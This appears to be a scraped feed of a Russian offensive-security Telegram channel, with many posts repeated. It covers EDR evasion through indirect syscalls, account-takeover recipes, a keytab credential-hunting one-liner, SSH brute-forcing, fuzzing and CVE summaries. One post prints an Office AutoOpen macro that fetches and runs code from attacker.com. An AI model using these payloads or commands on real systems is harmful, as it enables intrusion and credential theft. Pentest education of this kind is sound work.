14 добрых хакеров | Большое интервью со специалистами ИБ
Крутое и длительное интервью от коллег из SecLab. Всем советую посмотреть)
#интервью
Крутое и длительное интервью от коллег из SecLab. Всем советую посмотреть)
#интервью
🔥3❤🔥1
Acheron
Indirect Syscalls для обхода AV/EDR в Go Assembly
Acheron - это библиотека, вдохновленная SysWhisper3/FreshyCalls/RecycledGate, с большей частью функциональности, реализованной на Go assembly.
Пакет acheron может быть использован для добавления возможностей indirect syscall capabilities в ваш Golang tradecraft, для обхода AV/EDRs, которая использует usermode hooks и instrumentation callbacks для обнаружения аномальных syscalls, которые не возвращаются в ntdll.dll, когда вызов переходит обратно из kernel->userland.
Установка:
Indirect Syscalls для обхода AV/EDR в Go Assembly
Acheron - это библиотека, вдохновленная SysWhisper3/FreshyCalls/RecycledGate, с большей частью функциональности, реализованной на Go assembly.
Пакет acheron может быть использован для добавления возможностей indirect syscall capabilities в ваш Golang tradecraft, для обхода AV/EDRs, которая использует usermode hooks и instrumentation callbacks для обнаружения аномальных syscalls, которые не возвращаются в ntdll.dll, когда вызов переходит обратно из kernel->userland.
Установка:
go install github.com/f1zm0/acheron@latest#tools
🫡4❤3
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Я наконец закончил просмотр докладов с прошедшего PHD12 и, как обычно, делюсь тем, что мне понравилось:
* Внедрение кода в процессы из контекста ядра Linux [video]
* Антология способов программного мониторинга и защиты Linux в пользовательском пространстве [video]
* 0-day-эксплойты рансомварщиков для Windows [video]
* Социальная инженерия: тенденции red team, технические аспекты kill chain и проектный опыт [video]
* Red teaming: методики фишинговых атак [video]
* Port security bypass: подключаемся к сети через любую розетку [video]
* Геопространственная разведка на вашем рабочем столе [video]
P.S. если у кого есть презентации данных докладов, прошу в личку @hackerralf8
#redteam #pentest #initial #osint #exploit #malware #video
* Внедрение кода в процессы из контекста ядра Linux [video]
* Антология способов программного мониторинга и защиты Linux в пользовательском пространстве [video]
* 0-day-эксплойты рансомварщиков для Windows [video]
* Социальная инженерия: тенденции red team, технические аспекты kill chain и проектный опыт [video]
* Red teaming: методики фишинговых атак [video]
* Port security bypass: подключаемся к сети через любую розетку [video]
* Геопространственная разведка на вашем рабочем столе [video]
P.S. если у кого есть презентации данных докладов, прошу в личку @hackerralf8
#redteam #pentest #initial #osint #exploit #malware #video
🔥4
Пентест — самая творческая ИБ-дисциплина, а у всех креативных профессий есть премия. Awillix создали Pentest Awards — первую в России премию исключительно для пентестеров.
→ 6 номинаций для разных частей имитации хакерских атак;
→ Топовые профессионалы в совете жюри;
→ Заявка — это обезличенный рассказ про лучший проект в свободной форме;
→ Награда — техника Apple для 1,2,3 места + билеты на Offzone, обучение в школе CyberED, много мерча и самое главное — респект всего комьюнити :)
Отправляйте заявки на сайте — https://award.awillix.ru/, время органиченно.
→ 6 номинаций для разных частей имитации хакерских атак;
→ Топовые профессионалы в совете жюри;
→ Заявка — это обезличенный рассказ про лучший проект в свободной форме;
→ Награда — техника Apple для 1,2,3 места + билеты на Offzone, обучение в школе CyberED, много мерча и самое главное — респект всего комьюнити :)
Отправляйте заявки на сайте — https://award.awillix.ru/, время органиченно.
🤣5🔥4❤🔥3🫡3
Monitorizer
Очередной инструмент поиска поддоменов, вдохновленный subalert. Но у него есть интересная особенность. Он имеет интеграцию с nuclei, Acunetix, Slack.
Интеграция nuclei:
1. По умолчанию интеграцию уже включена, если вы хотите ё выключить, то отредактируйте файл
Интеграция Acunetix:
1. Вам нужно иметь запущенный Acunetix.
2. По умолчанию эта интеграция отключена, чтобы включить ее, необходимо написать
3. На каждый новый найденный поддомен будет создаваться новый инстанс в Acunetix, который будет сканировать таргет.
Интеграция Slack:
Очередной инструмент поиска поддоменов, вдохновленный subalert. Но у него есть интересная особенность. Он имеет интеграцию с nuclei, Acunetix, Slack.
Интеграция nuclei:
1. По умолчанию интеграцию уже включена, если вы хотите ё выключить, то отредактируйте файл
config/default.yaml
2. Nuclei будет пересканировать все поддомены (не только найденные)Интеграция Acunetix:
1. Вам нужно иметь запущенный Acunetix.
2. По умолчанию эта интеграция отключена, чтобы включить ее, необходимо написать
@monitorizer acunetix enable в запущенный monitorizer.3. На каждый новый найденный поддомен будет создаваться новый инстанс в Acunetix, который будет сканировать таргет.
Интеграция Slack:
report:Подготовка окружения:
slack: # required
channel: CM8XXXXXX
token: BZBZBZBBZB-XXXXXXXXXX-ZZZZZZZZZZ-YYYYYYYYYYYYYY
acunetix: # optional
token: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
host: acunetix.exmaple.com
port: 3443
settings:
nuclei:
enable: true
interval: 86400 # rescan all targets in the watch list every 24h
options: -impact high
sudo pip3 install -r requirements.txt
Запуск мониторинга:python monitor.py -w watch_targets.txtMonitorizer поддерживает более одного инструмента поиска субдоменов для поиска наибольшего количества целей:
scanners = [Также если вам нужно будет подключить API сторонних сервисов/инструментов сохраняйте их сюда:
aiodnsbrute, # https://github.com/blark/aiodnsbrute (included)
subfinder, # https://github.com/subfinder/subfinder (included)
sublist3r, # https://github.com/aboul3la/Sublist3r (included)
dnsrecon, # https://github.com/darkoperator/dnsrecon (included)
dnscan, # https://github.com/rbsec/dnscan (included)
amass, # https://github.com/OWASP/Amass (included)
]
config/thirdparty/*
Запуск инстанса Monitorized:screen -dmS monitorizer bash -c 'python3 monitor.py -w targets.txt'#tools
❤4🔥2
reFlutter
Этот фреймворк помогает в reverse приложений Flutter, используя исправленную версию библиотеки Flutter, которая уже скомпилирована и готова к перепаковке приложений. В этой библиотеке изменен процесс десериализации снимков, что позволяет выполнять DAST в удобной форме.
Установка:
Также вам не нужно устанавливать ни сертификаты, ни root.
Также этот инструмент помогает обходить некоторые реализации flutter certificate pinning.
#tools
Этот фреймворк помогает в reverse приложений Flutter, используя исправленную версию библиотеки Flutter, которая уже скомпилирована и готова к перепаковке приложений. В этой библиотеке изменен процесс десериализации снимков, что позволяет выполнять DAST в удобной форме.
Установка:
pip3 install reflutter
Автор написал очень удобный framework для реверcf Flutter приложений, поэтому использование инструмента фактически однокнопочное:reflutter main.apk
Далее вам нужно настроить анализ трафика приложений в Burp Suite. Также вам не нужно устанавливать ни сертификаты, ни root.
Также этот инструмент помогает обходить некоторые реализации flutter certificate pinning.
#tools
🐳3🔥2🆒2
WordPress BookIt <= 2.3.7 – Authentication Bypass
CVE-2023-2834
Плагин BookIt для WordPress уязвим для обхода аутентификации в версиях до 2.3.7 включительно. Это связано с недостаточной проверкой пользователя при бронировании встречи через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например, администратора, если они знают его электронную почту.
Плагин BookIt предоставляет шорткод 'bookit' для встраивания календаря бронирования встреч в страницу на сайте WordPress. Используя эту функциональность, после выбора даты и времени в календаре можно забронировать встречу, указав имя, адрес электронной почты и пароль для регистрации.
Изучение исходного кода показывает, что плагин проверяет идентификатор пользователя на основе адреса электронной почты, указанного через параметр 'email'. Если email принадлежит существующему пользователю WordPress, он свяжет запрос с этим пользователем и установит для него аутентификационные cookies.
К сожалению, эта функциональность была реализована небезопасно, поскольку она не включает никаких проверок подлинности, таких как проверка пароля. Она просто ищет личность и разрешает это действие без надлежащей проверки и аутентификации.
Это дает возможность злоумышленникам обойти аутентификацию и получить доступ к произвольным учетным записям на сайтах с уязвимой версией плагина. Как всегда, это позволяет злоумышленникам полностью скомпрометировать уязвимый сайт WordPress и заразить атакуемый сервер.
#CVE
CVE-2023-2834
Плагин BookIt для WordPress уязвим для обхода аутентификации в версиях до 2.3.7 включительно. Это связано с недостаточной проверкой пользователя при бронировании встречи через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например, администратора, если они знают его электронную почту.
Плагин BookIt предоставляет шорткод 'bookit' для встраивания календаря бронирования встреч в страницу на сайте WordPress. Используя эту функциональность, после выбора даты и времени в календаре можно забронировать встречу, указав имя, адрес электронной почты и пароль для регистрации.
Изучение исходного кода показывает, что плагин проверяет идентификатор пользователя на основе адреса электронной почты, указанного через параметр 'email'. Если email принадлежит существующему пользователю WordPress, он свяжет запрос с этим пользователем и установит для него аутентификационные cookies.
К сожалению, эта функциональность была реализована небезопасно, поскольку она не включает никаких проверок подлинности, таких как проверка пароля. Она просто ищет личность и разрешает это действие без надлежащей проверки и аутентификации.
Это дает возможность злоумышленникам обойти аутентификацию и получить доступ к произвольным учетным записям на сайтах с уязвимой версией плагина. Как всегда, это позволяет злоумышленникам полностью скомпрометировать уязвимый сайт WordPress и заразить атакуемый сервер.
#CVE
Forwarded from SHADOW:Group
На сайтах, где идентификация идет по Email и есть возможность войти через Microsoft OAuth есть риск захвата аккаунта.
Дело в том, что Azure не проверяет установленную в аккаунте почту, что позволяет вам указать почту жертвы и войти на уязвимый сайт через OAUTH от ее имени.
- Жертва регается на сайте через свою почту.
- Заходим в Azure AD и меняем свою почту на почту жертвы.
- Заходим на сайт через Microsoft OAuth и получаем доступ к аккаунту жертвы.
Видео PoC
#web #ato #oauth
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
nOAuth | OAuth Implementation Flaw Affecting Azure AD OAuth Applications
nOAuth is an authentication implementation flaw that can affect Microsoft Azure AD multi-tenant OAuth applications. This demo video explains how the misconfiguration can lead to full account takeover and how to prevent it.
This blog on nOAuth has more details:…
This blog on nOAuth has more details:…
Forwarded from RedTeam brazzers (Миша)
Кража KeyTab.
Во время тестирования на проникновение часто встречаются системы Linux с настроенным Keytab. Keytab хранит пары принципала кербероса и его зашифрованных ключей. С помощью этих зашифрованных ключей можно получить TGT. В результате чего появляется возможность запросить TGT на имя принципала без ввода пароля. Kerberos на Linux уже далеко не редкость - гетерогенные сети становятся все более популярными по ряду причин. Например, может быть такой сценарий, что на Linux бекапится содержимое какой-либо шары, при этом получить доступ к этой шаре могут только пользователи домена. В таком случае пишется простенький скрипт на баш, в котором реализуется логика по запросу TGT тикета на основе KeyTab, а затем копирования файлов с шары. Причем для периодичности запуска скрипт добавляется в crontab.
Нам, как атакующим, конечно же, интересен процесс запроса TGT билета на основе KeyTab. Для этого можно использовать команду kinit со следующим синтаксисом:
Остается лишь одна проблема - обнаружение самих KeyTab файлов. Конечно, можно ручками через find искать эти файлы, потом также муторно проверять разрешения на них, что не есть хорошо. Поэтому я накалякал следующий командлет, который автоматически найдет все
1. Зеленым подсвечиваются те файлы, которые принадлежат текущему пользователю.
2. Желтым подсвечиваются те файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь не имеет достаточных прав (чтение/запись) на этот самый KeyTab.
3. Наконец, красным подсвечиваются файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь имеет достаточные права на этот самый KeyTab.
Во время тестирования на проникновение часто встречаются системы Linux с настроенным Keytab. Keytab хранит пары принципала кербероса и его зашифрованных ключей. С помощью этих зашифрованных ключей можно получить TGT. В результате чего появляется возможность запросить TGT на имя принципала без ввода пароля. Kerberos на Linux уже далеко не редкость - гетерогенные сети становятся все более популярными по ряду причин. Например, может быть такой сценарий, что на Linux бекапится содержимое какой-либо шары, при этом получить доступ к этой шаре могут только пользователи домена. В таком случае пишется простенький скрипт на баш, в котором реализуется логика по запросу TGT тикета на основе KeyTab, а затем копирования файлов с шары. Причем для периодичности запуска скрипт добавляется в crontab.
Нам, как атакующим, конечно же, интересен процесс запроса TGT билета на основе KeyTab. Для этого можно использовать команду kinit со следующим синтаксисом:
kinit –kt <keytab> <принципал>
Например, если файл /tmp/admin.keytab служит для аутентификации пользователя admin@OFFICE.LOCAL , то делаем вот так:kinit -kt /tmp/admin.keytab admin@OFFICE.LOCAL Остается лишь одна проблема - обнаружение самих KeyTab файлов. Конечно, можно ручками через find искать эти файлы, потом также муторно проверять разрешения на них, что не есть хорошо. Поэтому я накалякал следующий командлет, который автоматически найдет все
.keytab файлы , а затем подсветит интересные разными цветами:1. Зеленым подсвечиваются те файлы, которые принадлежат текущему пользователю.
2. Желтым подсвечиваются те файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь не имеет достаточных прав (чтение/запись) на этот самый KeyTab.
3. Наконец, красным подсвечиваются файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь имеет достаточные права на этот самый KeyTab.
find / -iname '*.keytab' -type f -exec ls -l {} \; 2>/dev/null | awk -v user="$(whoami)" 'BEGIN { FS = OFS = " "; red = "\033[31m"; yellow = "\033[33m"; green = "\033[32m"; reset = "\033[0m" } { if ($3 == user && $9 ~ /.keytab$/) { printf green } else if ($3 != user && $9 ~ /.keytab$/ && $1 ~ /^-.w.r../) { printf red } else if ($3 != user && $9 ~ /.keytab$/ && ($1 !~ /^.w.r../ || $1 !~ /^-.w../)) { printf yellow } print $0; printf reset }'👏4❤1
Forwarded from Hack IT Easy
PEN-200-2023.pdf
49.2 MB
PEN-200-2023 💻
Наконец появилось то, что так долго ждали - обновленный курс OSCP. Мне новая методичка понравилась гораздо больше, чем предыдущая. Структурированный материал. Видна работа методологов.
Забираем и наслаждаемся.
Наконец появилось то, что так долго ждали - обновленный курс OSCP. Мне новая методичка понравилась гораздо больше, чем предыдущая. Структурированный материал. Видна работа методологов.
Забираем и наслаждаемся.
🔥6❤1🤝1
msLDAPDump
LDAP Enumeration Tool. msLDAPDump упрощает перечисление LDAP в домене, превращая библиотеку lpap3 из Python в простой в использовании интерфейс. Как и большинство инструментов, этот лучше всего работает под Windows. Если используется Unix, инструмент не будет определять имена хостов, которые в настоящее время недоступны через eth0.
#tools
LDAP Enumeration Tool. msLDAPDump упрощает перечисление LDAP в домене, превращая библиотеку lpap3 из Python в простой в использовании интерфейс. Как и большинство инструментов, этот лучше всего работает под Windows. Если используется Unix, инструмент не будет определять имена хостов, которые в настоящее время недоступны через eth0.
#tools
❤2
Media is too big
VIEW IN TELEGRAM
Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution
CVE-2023-28285
Сама атака осуществляется локально пользователем, имеющим аутентификацию на целевой системе. Злоумышленник может использовать уязвимость путем убеждения жертвы с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной
атаку на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл
PoC:
CVE-2023-28285
Сама атака осуществляется локально пользователем, имеющим аутентификацию на целевой системе. Злоумышленник может использовать уязвимость путем убеждения жертвы с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной
атаку на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл
Word для Office-365 API. После того, как пользователь откроет файл, чтобы прочитать его, из API Office-365, не будучи спрошенным, что он хочет активировать, и т.д., он активирует код вредоносного сервера, который он внедрит сам, с этого вредоносного сервера. После этого клика, злоумышленник может получить конфиденциальную информацию!PoC:
Sub AutoOpen()#CVE #RCE #POC #Microsoft
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub
Cbrutekrag
Написанный на C инструмент для брутфорса SSH серверов с помощью словарей.
Сборка:
Написанный на C инструмент для брутфорса SSH серверов с помощью словарей.
Сборка:
git clone --depth=1 https://github.com/matricali/cbrutekrag.gitИспользование:
cd cbrutekrag
make
make install
cbrutekrag -T targets.txt -C combinations.txt -o result.log#tools
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24
❤7
Этим вечером хочу порекомендовать вам быстро развивающийся канал коллеги по цеху, который активно улучшает и создает контент для нашего с вами комьюнити. Многим из вас думаю понравиться его стиль и ход мыслей)
Присоединиться
Присоединиться
🗿1
Firefly
Firefly - это продвинутый fuzzer, а не просто инструмент для bruteforce. Firefly дает преимущество тестирования цели с помощью большого количества встроенных тестов для обнаружения поведения цели. Firefly находится на первых стадия разработки, но работает корректно. Данный инструмент имеет огромное количество интересных преимуществ.
Установка:
#tools
Firefly - это продвинутый fuzzer, а не просто инструмент для bruteforce. Firefly дает преимущество тестирования цели с помощью большого количества встроенных тестов для обнаружения поведения цели. Firefly находится на первых стадия разработки, но работает корректно. Данный инструмент имеет огромное количество интересных преимуществ.
Установка:
go install -v github.com/Brum3ns/firefly/cmd/firefly@latestСборка:
git clone https://github.com/Brum3ns/firefly.gitБазовое использование:
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h
firefly -hПродвинутое использование:
firefly -u 'http://example.com/?query=FUZZ'
firefly -u 'http://example.com/?query=FUZZ' --timeout 7000Поддержка GET запросов
firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws
echo 'http://example.com/?query=FUZZ' | firefly
firefly -r 'Поддержка POST запросов
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'
firefly -r 'Верификация результата
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ
B=2&C=3' -au replace
firefly -u 'http://example.com/?query=FUZZ' -eСохранение результатов:
firefly -u 'http://example.com/?query=FUZZ' -o file.txtУ инструмента ещё много функций, которые мне не удалось уместить в статью, так что пользуйтесь на здоровье и читайте документацию)
firefly -u 'http://example.com/?query=FUZZ' -oJ file.json
#tools
❤4🔥4🎉2🆒1
🔵Firejail
Firejail - это программа-песочница SUID, которая снижает риск нарушения безопасности, ограничивая среду выполнения ненадежных приложений с использованием пространств имен Linux, seccomp-bpf и возможностей Linux. Она позволяет процессу и всем его потомкам иметь свой собственный частный вид общих ресурсов ядра, таких как сетевой стек, таблица процессов, таблица монтирования. Firejail может работать в среде SELinux или AppArmor и интегрирован с группами управления Linux.
Написанное на C с практически отсутствующими зависимостями программное обеспечение работает на любом компьютере Linux с версией ядра 3.x или новее. Оно может создавать песочницу для любого типа процессов: серверов, графических приложений и даже пользовательских сеансов входа в систему. Программное обеспечение включает профили песочницы для ряда более распространенных программ Linux, таких как Mozilla Firefox, Chromium, VLC, Transmission и т.д.
Песочница легкая, накладные расходы низкие. Нет сложных файлов конфигурации для редактирования, нет открытых соединений сокетов, нет демонов, работающих в фоновом режиме. Все функции безопасности реализованы непосредственно в ядре Linux и доступны на любом компьютере Linux.
Установка:
Firejail - это программа-песочница SUID, которая снижает риск нарушения безопасности, ограничивая среду выполнения ненадежных приложений с использованием пространств имен Linux, seccomp-bpf и возможностей Linux. Она позволяет процессу и всем его потомкам иметь свой собственный частный вид общих ресурсов ядра, таких как сетевой стек, таблица процессов, таблица монтирования. Firejail может работать в среде SELinux или AppArmor и интегрирован с группами управления Linux.
Написанное на C с практически отсутствующими зависимостями программное обеспечение работает на любом компьютере Linux с версией ядра 3.x или новее. Оно может создавать песочницу для любого типа процессов: серверов, графических приложений и даже пользовательских сеансов входа в систему. Программное обеспечение включает профили песочницы для ряда более распространенных программ Linux, таких как Mozilla Firefox, Chromium, VLC, Transmission и т.д.
Песочница легкая, накладные расходы низкие. Нет сложных файлов конфигурации для редактирования, нет открытых соединений сокетов, нет демонов, работающих в фоновом режиме. Все функции безопасности реализованы непосредственно в ядре Linux и доступны на любом компьютере Linux.
Установка:
sudo add-apt-repository ppa:deki/firejailСборка:
sudo apt-get update
sudo apt-get install firejail firejail-profiles
git clone https://github.com/netblue30/firejail.git
cd firejail
./configure && make && sudo make install-strip
Запуск различных приложений:firejail firefox # запуск Mozilla Firefox#tools
firejail transmission-gtk # запуск Transmission BitTorrent
firejail vlc # запуск VideoLAN Client
sudo firejail /etc/init.d/nginx start
🔥8⚡1
Forwarded from Что-то на пентестерском
Привет! Году в 2019-2020 вышло исследование на тему данной атаки, она может применяется в вебе, тем самым можно получить RCE, данная атака принимается и в баг баунти
Автор этой атаки получил таким образом RCE в 35 компаний, давай разберемся в чем ее суть и как работает
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤3
Forwarded from BI.ZONE Bug Bounty
Публичная программа «Тинькофф» на BI.ZONE Bug Bounty выходит на новый уровень.
В скоупе теперь open-source код некоторых разработок компании: OpenAPI, мобильные SDK, бэкенд-фреймворки и многое другое.
Смотрите полный список на сайте платформы — и вперед за баунти!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤🔥2👍2🌚1
Forwarded from NETRUNNER GROUP (Tripini FKYL)
И мы снова готовы вас шокировать ⛈
❤️ Мы готовим полномасштабный проект, сериал о специалистах отдела безопасности в крупной фирме и их жизненные ситуации расказывающие об основных ошибках в безопасности компаний.
Сценарий уже почти готов, вносятся последние правки.
💀 Киллер фичей будет являться то что будут показаны реальные способы атак и их описание.
Сериал будет интересен как знающим, так и простым обывателям.
😈 Техническую поддержку нам будут обеспечивать наши любимые друзья и партнеры RESOLUTE ATTACK
Список платформ куда выйдут серии (как минимум) :
Youtube
Rutube
Dzen
P.S. Хотите фото со сьемок?)
Сценарий уже почти готов, вносятся последние правки.
Сериал будет интересен как знающим, так и простым обывателям.
Список платформ куда выйдут серии (как минимум) :
Youtube
Rutube
Dzen
P.S. Хотите фото со сьемок?)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤2🥰1🌚1